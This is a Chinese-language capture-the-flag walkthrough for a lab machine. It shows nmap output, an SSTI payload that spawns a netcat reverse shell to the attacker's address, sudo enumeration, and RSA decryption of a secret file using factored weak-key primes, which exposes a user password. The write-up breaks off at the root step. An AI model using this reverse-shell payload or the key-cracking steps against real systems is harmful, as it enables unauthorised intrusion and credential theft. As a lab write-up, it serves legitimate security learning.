Nmap #
[root@Hacking] /home/kali/Takedown
❯ nmap 192.168.55.138 -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u5 (protocol 2.0)
| ssh-hostkey:
| 3072 51:fb:66:e0:d2:b6:ae:16:a9:d2:74:41:a5:b3:02:2b (RSA)
| 256 93:a0:01:6c:42:cd:26:bf:38:e5:70:fb:b8:c6:b3:fe (ECDSA)
|_ 256 77:c9:ed:41:a5:cb:30:33:08:22:88:f6:a8:28:11:8d (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Cybersecurity Inc - Secure Your Digital World
|_http-server-header: nginx/1.18.0
SSTI #
进入到ticket.shieldweb.che,发现存在SSTI漏洞
{{lipsum.__globals__.__getitem__('os').popen('nc 192.168.55.4 4444 -e /bin/sh').read()}}
可以收到反弹shell,不过当前是docker环境
/script # ls -al
total 8
drwxr-xr-x 2 root root 60 Jul 31 06:34 .
drwxr-xr-x 21 root root 4096 Jul 30 13:50 ..
-rwxr-xr-x 1 root root 32 Jul 31 06:34 a.sh
/script # cat a.sh
nc 192.168.55.4 4444 -e /bin/sh
可以获取到love用户
Own mitnick #
查看sudo
love@osiris:~$ sudo -l
Matching Defaults entries for love on osiris:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User love may run the following commands on osiris:
(mitnick) NOPASSWD: /home/mitnick/sas
发现似乎可以通过命令run运行一个文件
Own tomu #
发现有一个公钥以及被加密的文件,猜测应该是需要破解出原文才能进行下一步
mitnick@osiris:~$ cat publickey.pub
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMov+hb0LOJW4z6w03Tv8yNswYDXkEMj
DJE46jQH3sERAgMBAAE=
-----END PUBLIC KEY-----
由于密钥很短,先获取一下n和e
[root@Hacking] /home/kali/Takedown
❯ cat a.py
from Crypto.PublicKey import RSA
key = RSA.importKey(open('publickey.pub', 'r').read())
print(f'n = {key.n}')
print(f'e = {key.e}')
[root@Hacking] /home/kali/Takedown
❯ python a.py
n = 91451963281284582263822096491513116919368195592939782118118773662653066690833
e = 65537
通过查表法进行分解p和q
from Crypto.PublicKey import RSA
from libnum import *
# 读取公钥
key = RSA.importKey(open('publickey.pub', 'r').read())
n = key.n
e = key.e
# 从 FactorDB 得到的质因数
p = 272799705830086927219936172916283678397
q = 335234831001780341003153415948249295589
# 计算私钥 d
d = invmod(e, (p - 1) * (q - 1))
# 读取密文并解密
c = s2n(open('secret.enc', 'rb').read())
m = pow(c, d, n)
# 输出明文
print(n2s(m))
# b'\x02\x8fx~\x04\xdc;\x19\xbd\x99\x10\x96\x00sh1m0mur4Bl4ckh4t\n'
切换用户拿到user.txt
Root #
查看sudo
tomu@osiris:~$ sudo -l
[sudo] password for tomu:
Matching Defaults entries for tomu on osiris:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tomu may run the following commands on osiris:
(root) /opt/Contempt/Contempt
运行选择第二个
